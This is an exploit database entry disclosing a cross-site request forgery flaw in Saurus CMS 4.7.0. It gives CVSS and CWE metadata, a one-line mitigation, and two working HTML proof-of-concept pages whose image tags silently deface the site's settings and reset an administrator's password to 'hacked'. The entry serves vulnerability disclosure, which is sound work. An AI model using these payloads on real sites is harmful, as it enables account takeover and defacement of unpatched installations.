Saurus CMS 4.7.0 CSRF Vulnerability

vendor:

Saurus CMS

by:

Fady Mohammed Osman

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Saurus CMS

Affected Version From: 4.7.0

Affected Version To: 4.7.0

Patch Exists: NO

Related CWE: Not available

CPE: a:saurus:saurus_cms:4.7.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 10.04

2020

Saurus CMS 4.7.0 CSRF Vulnerability

Saurus CMS 4.7.0 is vulnerable to Cross-Site Request Forgery (CSRF) attacks. This vulnerability allows a malicious hacker to change the password of a user and also change the website information. The PoC 1 demonstrates how a malicious hacker can change the website information, while the PoC 2 demonstrates how a malicious hacker can change the user's password.

Mitigation:

The website should implement a CSRF token to verify the authenticity of the request.

Source

Exploit-DB raw data:

# Author: Fady Mohammed Osman (cute hacker)
# Software Link: http://www.saurus.info/download/SaurusCMS-4.7.0.tgz
# Version: 4.7.0
# Tested on: Ubuntu 10.04
# CVE : [Not available]
# This vulnerability allows a malicious hacker to change password of a user
and also it allows changing the website information.

PoC 1:

<html>
<head><title>Saurus CSRF : Change site information</title></head>
<body>
<img src="http://localhost/saurus/admin/change_config.php?group=1&site_name=hacked+by+cutehacker&slogan=hacked&meta_title=hacked&meta_description=hacked&meta_keywords=hacked&save=1&flt_keel=1&page_end_html=&timezone=">
</body>
</html>

PoC 2:

<html>
<head><title>Saurus CSRF : Change user's password</title></head>
<body>
<img src="http://localhost/saurus/admin/edit_user.php?tab=account&user_id=19&group_id=1&op=edit&op2=save&username=admin&password=hacked&password_confirmation=hacked&pass_expires=01.01.2029&is_predefined=1">
</body>
</html>